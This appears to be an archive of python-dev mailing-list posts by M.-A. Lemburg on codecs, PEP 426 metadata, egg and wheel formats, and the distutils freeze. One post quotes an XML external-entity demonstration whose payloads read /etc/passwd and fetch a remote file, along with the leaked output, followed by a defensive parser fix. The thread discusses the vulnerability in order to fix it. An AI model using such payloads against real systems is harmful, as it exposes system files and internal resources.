Re: [Python-Dev] Why can't I encode/decode base64 without importing a module?

2013-04-23 Thread M.-A. Lemburg
On 23.04.2013 17:47, Guido van Rossum wrote:
 On Tue, Apr 23, 2013 at 8:22 AM, M.-A. Lemburg m...@egenix.com wrote:
 Just as reminder: we have the general purpose
 encode()/decode() functions in the codecs module:

 import codecs
 r13 = codecs.encode('hello world', 'rot-13')

 These interface directly to the codec interfaces, without
 enforcing type restrictions. The codec defines the supported
 input and output types.
 
 As an implementation mechanism I see nothing wrong with this. I hope
 the codecs module lets you introspect the input and output types of a
 codec given by name?

At the moment there is no standard interface to access supported
input and output types... but then: regular Python functions or
methods also don't provide such functionality, so no surprise
there ;-)

It's mostly a matter of specifying the supported type
combinations in the codec documentation.

BTW: What would be a use case where you'd want to
programmatically access such information before calling
the codec?
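To make the thread's point concrete, a short sketch in Python 3: rot-13 is a text-to-text codec, while base64 is bytes-to-bytes, and the codec itself defines the supported types. (The 'base64' codec alias is available via codecs.encode/decode as of Python 3.4.)

```python
import codecs

# rot-13 is a text<->text codec: str in, str out
assert codecs.encode('hello world', 'rot-13') == 'uryyb jbeyq'

# base64 is a bytes<->bytes codec; the codec defines the types
encoded = codecs.encode(b'hello world', 'base64')
assert encoded == b'aGVsbG8gd29ybGQ=\n'   # binascii appends a newline
assert codecs.decode(encoded, 'base64') == b'hello world'
```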

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Apr 23 2013)
 Python Projects, Consulting and Support ...   http://www.egenix.com/
 mxODBC.Zope/Plone.Database.Adapter ...   http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2013-04-17: Released eGenix mx Base 3.2.6 ... http://egenix.com/go43

: Try our mxODBC.Connect Python Database Interface for free ! ::

   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] XML DoS vulnerabilities and exploits in Python

2013-02-24 Thread M.-A. Lemburg
Reminds me of the encoding attacks that were possible in earlier
versions of Python... you could have e.g. an email processing
script run the Python test suite by simply sending a specially
crafted email :-)

On 21.02.2013 13:04, Christian Heimes wrote:
 Am 21.02.2013 11:32, schrieb Antoine Pitrou:
 You haven't proved that these were actual threats, nor how they
 actually worked. I'm gonna remain skeptical if there isn't anything
 more precise than "It highly depends on the parser and the application
 what kind of exploit is possible."
 
 https://bitbucket.org/tiran/defusedxml/src/82f4037464418bf11ea734969b7ca1c193e6ed91/other/python-external.py?at=default
 
 $ ./python-external.py
 
 REQUEST:
 
 <weather>Aachen</weather>
 
 RESPONSE:
 -
 <weather>The weather in Aachen is terrible.</weather>
 
 
 REQUEST:
 
 <?xml version="1.0" encoding="utf-8"?>
 <!DOCTYPE weather [
 <!ENTITY passwd SYSTEM "file:///etc/passwd">
 ]>
 <weather>&passwd;</weather>
 
 
 RESPONSE:
 -
 <error>Unknown city root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
 bin:x:2:2:bin:/bin:/bin/sh
 sys:x:3:3:sys:/dev:/bin/sh
 sync:x:4:65534:sync:/bin:/bin/sync
 games:x:5:60:games:/usr/games:/bin/sh
 man:x:6:12:man:/var/cache/man:/bin/sh
 lp:x:7:7:lp:/var/spool/lpd:/bin/sh
 mail:x:8:8:mail:/var/mail:/bin/sh
 news:x:9:9:news:/var/spool/news:/bin/sh
 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
 proxy:x:13:13:proxy:/bin:/bin/sh
 www-data:x:33:33:www-data:/var/www:/bin/sh
 backup:x:34:34:backup:/var/backups:/bi</error>
 
 
 REQUEST:
 
 <?xml version="1.0" encoding="utf-8"?>
 <!DOCTYPE weather [
 <!ENTITY url SYSTEM
 "http://hg.python.org/cpython/raw-file/a11ddd687a0b/Lib/test/dh512.pem">
 ]>
 <weather>&url;</weather>
 
 
 RESPONSE:
 -
 <error>Unknown city -----BEGIN DH PARAMETERS-----
 MEYCQQD1Kv884bEpQBgRjXyEpwpy1obEAxnIByl6ypUM2Zafq9AKUJsCRtMIPWak
 XUGfnHy9iUsiGSa6q6Jew1XpKgVfAgEC
 -----END DH PARAMETERS-----
 
 These are the 512 bit DH parameters from "Assigned Number for SKIP
 Protocols"
 (http://www.skip-vpn.org/spec/numbers.html).
 See there for how they were generated.
 Note that g is not a generator, but this is not a problem since p is a
 safe prime.
 </error>
 
 
 Q.E.D.
 Christian
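For reference, the external-entity vector shown above can be switched off with the stdlib's own xml.sax parser. A minimal sketch (the defusedxml project linked above covers this and the other vectors more completely):

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

EVIL = b"""<?xml version="1.0"?>
<!DOCTYPE weather [
<!ENTITY passwd SYSTEM "file:///etc/passwd">
]>
<weather>&passwd;</weather>"""

class Capture(ContentHandler):
    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)

handler = Capture()
parser = xml.sax.make_parser()
parser.setFeature(feature_external_ges, False)  # never load external entities
parser.setContentHandler(handler)
parser.parse(io.BytesIO(EVIL))
assert "".join(handler.chunks) == ""  # /etc/passwd was never read
```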



Re: [Python-Dev] Fwd: PEP 426 is now the draft spec for distribution metadata 2.0

2013-02-20 Thread M.-A. Lemburg
On 20.02.2013 03:37, Paul Moore wrote:
 On 20 February 2013 00:54, Fred Drake f...@fdrake.net wrote:
 I'd posit that anything successful will no longer need to be added to
 the standard library, to boot.  Packaging hasn't done well there.
 
 distlib may be the exception, though. Packaging tools are somewhat
 unique because of the chicken and egg issue involved in having a
 packaging tool with external dependencies - who installs your
 dependencies for you? So enabling technology (library code to perform
 packaging-related tasks, particularly in support of standardised
 formats) could be better available from the stdlib.
 
 I'd rather see a successful packaging story develop than bundle it into the
 standard library.  The later just isn't that interesting any more.
 
 Bundling too early is a bad idea though. distlib is developing fast
 and to do so it needs (1) a development cycle independent of python's
 and (2) compatibility and ease of use with earlier versions of Python
 (the latter is also critical for adoption in place of custom code in
 packaging tools).
 
 Aiming for an accelerated level of development targeting inclusion in
 Python 3.4 is plausible, though. MAL pointed out that agreeing
 standards but not offering tools to support them in the stdlib is
 risky, as people have no incentive to adopt those standards. We've got
 6 months or more until 3.4 feature freeze, let's not make any decision
 too soon, though.

I'm fine with not adding distlib to Python 3.4. The point I wanted
to make was that there has to be a reference implementation of the PEP
that tool makers can use, to avoid reinventing the wheel over and over
again (each with its own set of problems).

If distlib implements the PEP, then it just needs to be
mentioned there as a suitable reference implementation.



Re: [Python-Dev] Fwd: PEP 426 is now the draft spec for distribution metadata 2.0

2013-02-20 Thread M.-A. Lemburg
On 20.02.2013 00:16, Daniel Holth wrote:
 On Tue, Feb 19, 2013 at 5:10 PM, M.-A. Lemburg m...@egenix.com wrote:
 
 On 19.02.2013 23:01, Daniel Holth wrote:
 On Tue, Feb 19, 2013 at 4:34 PM, M.-A. Lemburg m...@egenix.com wrote:

 On 19.02.2013 14:40, Nick Coghlan wrote:
 On Tue, Feb 19, 2013 at 11:23 PM, M.-A. Lemburg m...@egenix.com
 wrote:
 * PEP 426 doesn't include any mention of the egg distribution format,
   even though it's the most popular distribution format at the moment.
   It should at least include the location of the metadata file
   in eggs (EGG-INFO/PKG-INFO) and egg installations
   (eggdir/EGG-INFO/PKG-INFO).

 Other tools involved in Python distribution may also use this format.

 The egg format has never been, and never will be, officially endorsed
 by python-dev. The wheel format is the standard format for binary
 distribution, and PEP 376 defines the standard location for metadata
 on installed distributions.

 Oh, come on, Nick, that's just silly. setuptools was included in the stdlib
 for a short while, so the above is simply wrong. Eggs are the most
 widely used binary distribution format for Python packages on PyPI:

 # wc *files.csv
   25585   25598 1431013 2013-02-19-egg-files.csv
    4619    4640  236694 2013-02-19-exe-files.csv
     254     255   13402 2013-02-19-msi-files.csv
  104691  104853 5251962 2013-02-19-tar-gz-files.csv
      24      24    1221 2013-02-19-whl-files.csv
   17937   18022  905913 2013-02-19-zip-files.csv
  153110  153392 7840205 total

 (based on today's PyPI stats)

 It doesn't really help ignoring realities... and I'm saying
 that as one of the core devs who got setuptools kicked out of
 the stdlib again.

 --
 Marc-Andre Lemburg
 eGenix.com


 The wheel philosophy is that it should be supported by both python-dev
 and
 setuptools and that you should feel happy about using setuptools if you
 like it whether or not python-dev (currently) endorses that. If you are
 using setuptools (distribute's pkg_resources) then you can use both at
 the
 same time.

 Distribute, distutils and setuptools' problems have not been well
 understood which I think is why there has been a need to discredit
 setuptools by calling it non-standard. It is the defacto standard. If
 your
 packages have dependencies there is no other choice. Wheel tries to solve
 the real problem by allowing you to build a package with setuptools while
 giving the end-user the choice of installing setuptools or not.

 Of course eggs are the most popular right now. The wheel format is very
 egg-like while avoiding some of egg's problems. See the comparison in the
 PEP or read the story on wheel's rtfd. The wheel project includes tools
 to
 losslessly convert eggs or bdist_wininst to wheel.

 That's all fine, but it doesn't explain the refusal to add the
 documentation of the location of the PKG-INFO file in eggs.
 
 
 It would just be a sentence, I wouldn't have a problem with it but I also
 don't see why it would be necessary. Even setuptools doesn't touch the file
 usually. Right now distribute's pkg_resources currently only understands
 Requires-Dist if it is inside a .dist-info directory.

Perhaps I'm not clear enough. I'll try again :-)

The wording in the PEP alienates the egg format by defining
an incompatible new standard for the location of the metadata
file:


There are three standard locations for these metadata files:

* the PKG-INFO file included in the base directory of Python source
  distribution archives (as created by the distutils sdist command)
* the {distribution}-{version}.dist-info/METADATA file in a wheel binary
  distribution archive (as described in PEP 425, or a later version of
  that specification)
* the {distribution}-{version}.dist-info/METADATA files in a local Python
  installation database (as described in PEP 376, or a later version of
  that specification)


It's easy to upgrade distribute and distutils to write
metadata 1.2 format, simply by changing the version in the
PKG-INFO files.

These additions are necessary to fix the above and also to include
the standard locations of the metadata for pip and distutils installations:

* the EGG-INFO/PKG-INFO file in an egg binary distribution archive
  (as created by the distribute bdist_egg command)

* the {distribution}-{version}.egg/EGG-INFO/PKG-INFO file in an
  installed egg distribution archive

* the {distribution}-{version}.egg-info/PKG-INFO file for packages
  installed with pip install or distribute's python setup.py install

* the {distribution}-{version}.egg-info file for packages installed
  with distutils' python setup.py install
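For tool authors, reading that metadata out of an egg archive only needs the stdlib. A sketch, assuming a well-formed egg (the in-memory archive below is a stand-in for a real .egg file):

```python
import io
import zipfile

def read_egg_pkg_info(egg_path_or_file):
    # Eggs are plain zip archives; the metadata lives at EGG-INFO/PKG-INFO
    with zipfile.ZipFile(egg_path_or_file) as egg:
        return egg.read("EGG-INFO/PKG-INFO").decode("utf-8")

# Demo with an in-memory stand-in for a real egg file
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as egg:
    egg.writestr("EGG-INFO/PKG-INFO", "Metadata-Version: 1.1\nName: demo\n")
assert read_egg_pkg_info(buf).startswith("Metadata-Version: 1.1")
```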


Re: [Python-Dev] Fwd: PEP 426 is now the draft spec for distribution metadata 2.0

2013-02-19 Thread M.-A. Lemburg


On 17.02.2013 11:11, Nick Coghlan wrote:
 FYI
 
 
 -- Forwarded message --
 From: Nick Coghlan ncogh...@gmail.com
 Date: Sun, Feb 17, 2013 at 8:10 PM
 Subject: PEP 426 is now the draft spec for distribution metadata 2.0
 To: DistUtils mailing list distutils-...@python.org
 
 
 The latest draft of PEP 426 is up at http://www.python.org/dev/peps/pep-0426/
 
 Major changes since the last draft:
 
 1. Metadata-Version is 2.0 rather than 1.3, and the field now has the
 same major.minor semantics as are defined for wheel versions in PEP
 427 (i.e. if a tool sees a major version number it doesn't recognise,
 it should give up rather than trying to guess what to do with it,
 while it's OK to process a higher minor version)
 
 2. The Private-Version field is added, and several examples are
 given showing how to use it in conjunction with translated public
 versions when a project wants to use a version numbering scheme that
 the standard installation tools won't understand.
 
 3. The environment markers section more clearly covers the need to
 handle parentheses (this was mentioned in the text, but not the
 pseudo-grammar), and the fields which support those markers have an
 explicit cross-reference to that section of the spec.
 
 4. Leading/trailing whitespace and date based versioning are
 explicitly excluded from valid public versions
 
 5. Version compatibility statistics are provided for this PEP relative
 to PEP 386 (the analysis script has been added to the PEP repo if
 anyone wants to check my numbers)
 
 6. I have reclaimed BDFL-Delegate status (with Guido's approval)
 
 Since getting wheel support into pip no longer depends on this version
 of the metadata spec, I plan to leave it open for comment for another
 week, and then accept it next weekend if I don't hear any significant
 objections.
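The major.minor rule quoted in point 1 can be sketched as follows (a hypothetical helper for illustration, not part of any tool):

```python
def can_process(metadata_version, supported_major=2):
    # Refuse unknown major versions; a higher minor version is acceptable
    major = int(metadata_version.split(".")[0])
    return major == supported_major

assert can_process("2.0") is True
assert can_process("2.1") is True    # higher minor: still processable
assert can_process("3.0") is False   # unknown major: give up
```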

Overall, I think the metadata for Python packages is getting
too complicated.

Without a support module in the stdlib implementing the required
parsing, evaluation and formatting mechanisms needed to analyze and
write the format, I'm -1 on adding yet another format version on top
of the stack.

At the moment, discussing yet another version update is mostly academic,
since not even version 1.2 has been picked up by the tools yet:

distutils still writes version 1.1 metadata and doesn't
even understand 1.2 metadata.

The only tool in widespread use that understands part of the 1.2 data
is setuptools/distribute, but it can only understand the Requires-Dist
field of that version of the spec (only because the 1.1 Requires field
was deprecated) and interprets a Provides-Extra field which isn't even
standard. All other 1.2 fields are ignored.
setuptools/distribute still writes 1.1 metadata.

I've never seen environment markers being used or supported
in the wild.
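For readers who haven't met them: an environment marker is a restricted expression such as sys_platform == 'win32' attached to a requires field. A minimal, hypothetical evaluator for the simplest form only (real markers also allow and/or and parentheses, per the PEP):

```python
import os
import sys

# Values a marker may refer to (a subset of the PEP's marker names)
MARKER_ENV = {
    "os_name": os.name,
    "sys_platform": sys.platform,
}

def evaluate_marker(marker):
    # Hypothetical helper: handles only "name == 'literal'" and
    # "name != 'literal'" comparisons
    name, op, literal = marker.split(None, 2)
    value = MARKER_ENV[name]
    literal = literal.strip("'\"")
    if op == "==":
        return value == literal
    if op == "!=":
        return value != literal
    raise ValueError("unsupported operator: %r" % op)

assert evaluate_marker("sys_platform == '%s'" % sys.platform) is True
assert evaluate_marker("os_name != 'no-such-os'") is True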

I'm not against modernizing the format, but given that version 1.2
has been out for around 8 years now, without much of a following,
I think we need to make the implementation part a requirement
before accepting the PEP.



Re: [Python-Dev] Fwd: PEP 426 is now the draft spec for distribution metadata 2.0

2013-02-19 Thread M.-A. Lemburg
On 19.02.2013 11:28, Nick Coghlan wrote:
 On Tue, Feb 19, 2013 at 7:37 PM, M.-A. Lemburg m...@egenix.com wrote:
 On 17.02.2013 11:11, Nick Coghlan wrote:
 I'm not against modernizing the format, but given that version 1.2
 has been out for around 8 years now, without much following,
 I think we need to make the implementation bit a requirement
 before accepting the PEP.
 
 It is being implemented in distlib, and the (short!) appendix to the
 PEP itself shows how to read the format using the standard library's
 email module.

Hmm, what is distlib and where does it live?

The PEP only shows how to parse the RFC822-style format used by the
metadata. That's not what I was referring to.

If a tool wants to support metadata 2.0, it has to support all
the complicated stuff as well, i.e. handle the requires fields,
the environment markers and version comparisons/sorting.
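The RFC822-style reading itself is indeed only a few lines with the stdlib's email module (the easy part; the PKG-INFO text below is made up for illustration):

```python
from email.parser import HeaderParser

# Hypothetical PKG-INFO contents for illustration
PKG_INFO = """\
Metadata-Version: 1.2
Name: example-dist
Version: 1.0
Requires-Dist: requests (>=2.0)
Requires-Dist: lxml
"""

meta = HeaderParser().parsestr(PKG_INFO)
assert meta["Metadata-Version"] == "1.2"
assert meta.get_all("Requires-Dist") == ["requests (>=2.0)", "lxml"]
```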

 v2.0 is designed to fix many of the issues that prevented the adoption
 of v1.2, including tweaks to the standardised version scheme and the
 addition of a formal extension mechanism to avoid the ad hoc
 extensions that occurred with earlier metadata versions.

Some more notes:

* I find it confusing that we now have two version schemes,
  one defined in PEP 426 (hidden in the middle of the document)
  and one in PEP 386. It would be better to amend or replace
  PEP 386, since that's where you look for Python version strings.

* PEP 426 doesn't include any mention of the egg distribution format,
  even though it's the most popular distribution format at the moment.
  It should at least include the location of the metadata file
  in eggs (EGG-INFO/PKG-INFO) and egg installations
  (eggdir/EGG-INFO/PKG-INFO).

Not sure whether related or not, I also think it would be a good idea
to make the metadata file available on PyPI for download (could be sent
there when registering the package release). The register command
only posts the data as 1.0 metadata, but includes fields from
metadata 1.1. PyPI itself only displays part of the data.

It would be useful to have the metadata readily available for
inspection on PyPI without having to download one of the
distribution files first.



Re: [Python-Dev] Fwd: PEP 426 is now the draft spec for distribution metadata 2.0

2013-02-19 Thread M.-A. Lemburg
On 19.02.2013 14:40, Nick Coghlan wrote:
 On Tue, Feb 19, 2013 at 11:23 PM, M.-A. Lemburg m...@egenix.com wrote:
 * PEP 426 doesn't include any mention of the egg distribution format,
   even though it's the most popular distribution format at the moment.
   It should at least include the location of the metadata file
   in eggs (EGG-INFO/PKG-INFO) and egg installations
   (eggdir/EGG-INFO/PKG-INFO).
 
 Other tools involved in Python distribution may also use this format.
 
 The egg format has never been, and never will be, officially endorsed
 by python-dev. The wheel format is the standard format for binary
 distribution, and PEP 376 defines the standard location for metadata
 on installed distributions.

Oh, come on, Nick, that's just silly. setuptools was included in the stdlib
for a short while, so the above is simply wrong. Eggs are the most
widely used binary distribution format for Python packages on PyPI:

# wc *files.csv
  25585   25598 1431013 2013-02-19-egg-files.csv
   4619    4640  236694 2013-02-19-exe-files.csv
    254     255   13402 2013-02-19-msi-files.csv
 104691  104853 5251962 2013-02-19-tar-gz-files.csv
     24      24    1221 2013-02-19-whl-files.csv
  17937   18022  905913 2013-02-19-zip-files.csv
 153110  153392 7840205 total

(based on today's PyPI stats)

It doesn't really help ignoring realities... and I'm saying
that as one of the core devs who got setuptools kicked out of
the stdlib again.



Re: [Python-Dev] Fwd: PEP 426 is now the draft spec for distribution metadata 2.0

2013-02-19 Thread M.-A. Lemburg
On 19.02.2013 14:40, Nick Coghlan wrote:
 On Tue, Feb 19, 2013 at 11:23 PM, M.-A. Lemburg m...@egenix.com wrote:
 On 19.02.2013 11:28, Nick Coghlan wrote:
 On Tue, Feb 19, 2013 at 7:37 PM, M.-A. Lemburg m...@egenix.com wrote:
 On 17.02.2013 11:11, Nick Coghlan wrote:
 I'm not against modernizing the format, but given that version 1.2
 has been out for around 8 years now, without much following,
 I think we need to make the implementation bit a requirement
 before accepting the PEP.

 It is being implemented in distlib, and the (short!) appendix to the
 PEP itself shows how to read the format using the standard library's
 email module.

 Hmm, what is distlib and where does it live?
 
 As part of the post-mortem of packaging's removal from Python 3.3,
 several subcomponents were identified as stable and useful. distlib is
 those subcomponents extracted into a separate repository by Vinay
 Sajip.
 
 It will be proposed as the standard library infrastructure for
 building packaging related tools, while distutils will become purely a
 build system and have nothing to do with installing software directly
 (except perhaps on developer machines).

Shouldn't those details be mentioned in the PEP?

 The PEP only shows how to parse the RFC822-style format used by the
 metadata. That's not what I was referring to.

 If a tool wants to support metadata 2.0, it has to support all
 the complicated stuff as well, i.e. handle the requires fields,
 the environment markers and version comparisons/sorting.
 
 Which is what distutils2 can be used for now, and what distlib will
 provide without the unwanted build system infrastructure in
 distutils2.

 v2.0 is designed to fix many of the issues that prevented the adoption
 of v1.2, including tweaks to the standardised version scheme and the
 addition of a formal extension mechanism to avoid the ad hoc
 extensions that occurred with earlier metadata versions.

 Some more notes:

 * I find it confusing that we now have two version schemes,
   one defined in PEP 426 (hidden in the middle of the document)
   and one in PEP 386. It would be better to amend or replace
   PEP 386, since that's where you look for Python version strings.
 
 You can't understand version specifiers without understanding the sort
 order defined for the version scheme, so documenting them separately
 is just a recipe for confusion.

PEP 386 defines both. The point here is that the version scheme
goes far beyond the metadata format and is complicated enough
to warrant a separate PEP.
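A two-line illustration of why the sort order is the crux here: naive string comparison, which tools fall back to without a standard scheme, orders versions wrongly.

```python
# Lexicographic comparison gets multi-digit components wrong
assert "1.10" < "1.9"

def version_key(version):
    # Minimal numeric key; real schemes also handle pre/post/dev tags
    return tuple(int(part) for part in version.split("."))

assert version_key("1.10") > version_key("1.9")
```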

 I plan to mark PEP 386 as Withdrawn when I accept this PEP, as the
 sorting scheme it defines is broken, and the distutils changes
 proposed in that PEP are never going to happen.

Hmm, Tarek is the author, so only he can withdraw the PEP, AFAIK.

 * PEP 426 doesn't include any mention of the egg distribution format,
   even though it's the most popular distribution format at the moment.
   It should at least include the location of the metadata file
   in eggs (EGG-INFO/PKG-INFO) and egg installations
   (eggdir/EGG-INFO/PKG-INFO).
 
 Other tools involved in Python distribution may also use this format.
 
 The egg format has never been, and never will be, officially endorsed
 by python-dev. The wheel format is the standard format for binary
 distribution, and PEP 376 defines the standard location for metadata
 on installed distributions.

See my other reply.


 Not sure whether related or not, I also think it would be a good idea
 to make the metadata file available on PyPI for download (could be sent
 there when registering the package release). The register command
 only posts the data as 1.0 metadata, but includes fields from
 metadata 1.1. PyPI itself only displays part of the data.
 
 It's not related, but I plan to propose the adoption of TUF (with GPG
 based signatures) for PyPI's end-to-end security solution, and the
 conversion of the metadata files to JSON for distribution through
 TUF's metadata support. (Donald Stufft already wrote a PEP 426-to-JSON
 bidirectional converter as part of an unrelated experiment.)

Why convert the metadata format you are defining in PEP 426
to yet another format when it can be uploaded as a file straight
to PyPI?

TUF doesn't have anything to do with that, agreed ;-)

 It would be useful to have the metadata readily available for
 inspection on PyPI without having to download one of the
 distribution files first.
 
 Indeed, which is a large part of why TUF (aka The Update Framework:
 https://www.updateframework.com/) is such an interesting security
 solution.

The suggestion to have the metadata available on PyPI doesn't
have anything to do with security.

It's about being able to determine compatibility and select the
right distribution file for download. The metadata also helps in
creating dependency graphs, which are useful for a lot of things.


Re: [Python-Dev] Fwd: PEP 426 is now the draft spec for distribution metadata 2.0

2013-02-19 Thread M.-A. Lemburg
On 19.02.2013 23:01, Daniel Holth wrote:
 On Tue, Feb 19, 2013 at 4:34 PM, M.-A. Lemburg m...@egenix.com wrote:
 
 On 19.02.2013 14:40, Nick Coghlan wrote:
 On Tue, Feb 19, 2013 at 11:23 PM, M.-A. Lemburg m...@egenix.com wrote:
 * PEP 426 doesn't include any mention of the egg distribution format,
   even though it's the most popular distribution format at the moment.
   It should at least include the location of the metadata file
   in eggs (EGG-INFO/PKG-INFO) and egg installations
   (eggdir/EGG-INFO/PKG-INFO).

 Other tools involved in Python distribution may also use this format.

 The egg format has never been, and never will be, officially endorsed
 by python-dev. The wheel format is the standard format for binary
 distribution, and PEP 376 defines the standard location for metadata
 on installed distributions.

 Oh, come on, Nick, that's just silly. setuptools was included in the stdlib
 for a short while, so the above is simply wrong. Eggs are the most
 widely used binary distribution format for Python packages on PyPI:

 # wc *files.csv
   25585   25598 1431013 2013-02-19-egg-files.csv
    4619    4640  236694 2013-02-19-exe-files.csv
     254     255   13402 2013-02-19-msi-files.csv
  104691  104853 5251962 2013-02-19-tar-gz-files.csv
      24      24    1221 2013-02-19-whl-files.csv
   17937   18022  905913 2013-02-19-zip-files.csv
  153110  153392 7840205 total

 (based on today's PyPI stats)

 It doesn't really help ignoring realities... and I'm saying
 that as one of the core devs who got setuptools kicked out of
 the stdlib again.

 --
 Marc-Andre Lemburg
 eGenix.com

 
 The wheel philosophy is that it should be supported by both python-dev and
 setuptools and that you should feel happy about using setuptools if you
 like it whether or not python-dev (currently) endorses that. If you are
 using setuptools (distribute's pkg_resources) then you can use both at the
 same time.
 
 Distribute, distutils and setuptools' problems have not been well
 understood which I think is why there has been a need to discredit
 setuptools by calling it non-standard. It is the defacto standard. If your
 packages have dependencies there is no other choice. Wheel tries to solve
 the real problem by allowing you to build a package with setuptools while
 giving the end-user the choice of installing setuptools or not.
 
 Of course eggs are the most popular right now. The wheel format is very
 egg-like while avoiding some of egg's problems. See the comparison in the
 PEP or read the story on wheel's rtfd. The wheel project includes tools to
 losslessly convert eggs or bdist_wininst to wheel.

That's all fine, but it doesn't explain the refusal to add the
documentation of the location of the PKG-INFO file in eggs.

 I am confident distlib can thrive outside of the standard library! Why the
 rush to kill it before its prime?

Who's trying to kill distlib?



Re: [Python-Dev] BDFL delegation for PEP 426 + distutils freeze

2013-02-04 Thread M.-A. Lemburg
On 03.02.2013 19:33, Éric Araujo wrote:
 I vote for removing the distutils is frozen principle.
 I’ve also been thinking about that.  There have been two exceptions to
 the freeze, for ABI flags in extension module names and for pycache
 directories.  When the stable ABI was added and MvL wanted to change
 distutils (I don’t know to do what exactly), Tarek stood firm on the
 freeze and asked for any improvement to go into distutils2, and after
 MvL said that he would not contribute to an outside project, we merged d2
 into the stdlib.  Namespace packages did not impact distutils either.
 Now that we’ve removed packaging from the stdlib, we have two Python
 features that are not supported in the standard packaging system, and I
 agree that it is a bad thing for our users.
 
 I’d like to propose a reformulation of the freeze:
 - refactorings for the sake of cleanup are still shunned
 - fixes to really old bugs that have become the expected behavior are
   still avoided
 - fixes to follow OS changes are still allowed (we’ve had a number for
   Debian multiarch, Apple moving stuff around, Windows manifest options
   changes)
 - support for Python evolutions that involve totally new code, commands
   or setup parameters are now possible (this enables stable API support
   as well as a new bdist format)
 - behavior changes to track Python behavior changes are now possible
   (this enables recognizing namespace packages, unless we decide they
   need a new setup parameter)
 
 We’ll probably need to talk this over at PyCon (FYI I won’t be at the
 language summit but I’ll take part in the packaging mini-summit planned
 thanks to Nick).

+1 on lifting the freeze from me.

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] [Python-checkins] Cron docs@dinsdale /home/docs/build-devguide

2012-12-22 Thread M.-A. Lemburg


On 22.12.2012 21:36, Terry Reedy wrote:
 
 On 12/22/2012 1:30 PM, Cron Daemon wrote:
 abort: error: Connection timed out
 ___
 Python-checkins mailing list
 python-check...@python.org
 http://mail.python.org/mailman/listinfo/python-checkins
 
 As a volunteer checkin-list admin, I occasionally get messages like this:
 '''
 As list administrator, your authorization is requested for the
 following mailing list posting:
 
 List:python-check...@python.org
 From:r...@python.org
 Subject: Cron docs@dinsdale /home/docs/build-devguide
 Reason:  Message has implicit destination
 
 At your convenience, visit:
 
 http://mail.python.org/mailman/admindb/python-checkins
 
 to approve or deny the request.
 '''
 
 I always reject the requests as I don't believe these messages belong
 here. I even asked, some months ago, on pydev who was responsible for
 the robot that sends these but got no answer. Today, apparently,
 another list admin decided on the opposite response and gave
 r...@python.org blanket permission to flood this list with irrelevancy.
 It is not my responsibility and I have no idea how to fix it.

You can add a sender filter to have the messages automatically discarded.

 While people with push privileges are supposed to subscribe to this
 list, I know there is at least one who unsubscribed because of the
 volume. This will only encourage more to leave, so I hope someone can
 stop it.

I think such messages should go to a sys admin list.

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] [Catalog-sig] accept the wheel PEPs 425, 426, 427

2012-11-13 Thread M.-A. Lemburg
On 13.11.2012 10:51, Martin v. Löwis wrote:
 Am 13.11.12 03:04, schrieb Nick Coghlan:
 On Mon, Oct 29, 2012 at 4:47 AM, Daniel Holth dho...@gmail.com
 mailto:dho...@gmail.com wrote:

 I think Metadata 1.3 is done. Who would like to czar?

 (Apologies for the belated reply, it's been a busy few weeks)

 I'm happy to be BDFL delegate for these. I'd like to see PEP 425 updated
 with some additional rationale based on Ronald's comments later in this
 thread, though.
 
 For the record, I'm still -1 on PEP 427, because of the signature issues.
 
 The FAQ in the PEP is incorrect in claiming PGP or X.509 cannot
 readily be used to verify the integrity of an archive - the whole
 point of these technologies is to do exactly that.
 
 The FAQ is entirely silent on why it is not using a more standard
 signature algorithm such as ECDSA. It explains why it uses Ed25519,
 but ignores that the very same rationale would apply to ECDSA as well;
 plus that would be one of the standard JWS algorithms.
 
 In addition, the FAQ claims that the format is designed to introduce
 cryptography that is actually used, yet leaves the issue of key
 distribution alone (except for pointing out that you can put keys
 into requires.txt - a file that doesn't seem to be specified anywhere).

I agree with Martin. If the point is to introduce cryptography
that is actually used, then not using the de-facto standard for signing
open source distribution files, which today is PGP/GPG, misses that
point :-)

Note that signing such distribution files can be handled outside
of the wheel format PEP. It is just way too complex and out of scope
for the wheel format itself. Also note that PGP/GPG and the other
signing tools work well on any distribution file. There's really no
need to build these into the format itself.

It's a good idea to check integrity, but that can be done using
hashes.
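
A hash-based integrity check of the kind suggested here takes only a few
lines with the stdlib (a sketch; the helper names are made up for
illustration, not part of any packaging tool):

```python
import hashlib

def file_digest(path, algorithm="sha256", chunk_size=65536):
    """Return the hex digest of a file, reading it in chunks."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

def verify(path, expected_hexdigest):
    """Accept a downloaded archive only if its digest matches
    the separately published one."""
    return file_digest(path) == expected_hexdigest
```

The published digest would come from a trusted channel (e.g. the index
page over HTTPS), which is exactly the key-distribution question the
signature discussion keeps running into.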

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Split unicodeobject.c into subfiles

2012-10-25 Thread M.-A. Lemburg
On 25.10.2012 08:42, Nick Coghlan wrote:
 Why are any of these codecs here in unicodeobjectland in the first
 place?  Sure, they're needed so that Python can find its own stuff,
 but in principle *any* codec could be needed.  Is it just an heuristic
 that the codecs needed for 99% of the world are here, and other codecs
 live in separate modules?
 
 I believe it's a combination of history and whether or not they're
 needed by the interpreter during the bootstrapping process before the
 encodings namespace is importable.

They are in unicodeobject.c so that compilers can inline the codec
code directly in the various other places where it is used in the
Unicode implementation. The codecs themselves also use a lot of
functions from the Unicode API (obviously), so the other direction of
inlining (Unicode API into the codecs) is needed as well.

BTW: When discussing compiler optimizations, please remember that
there are more compilers out there than just GCC and also the fact
that not everyone is using the latest and greatest version of it.
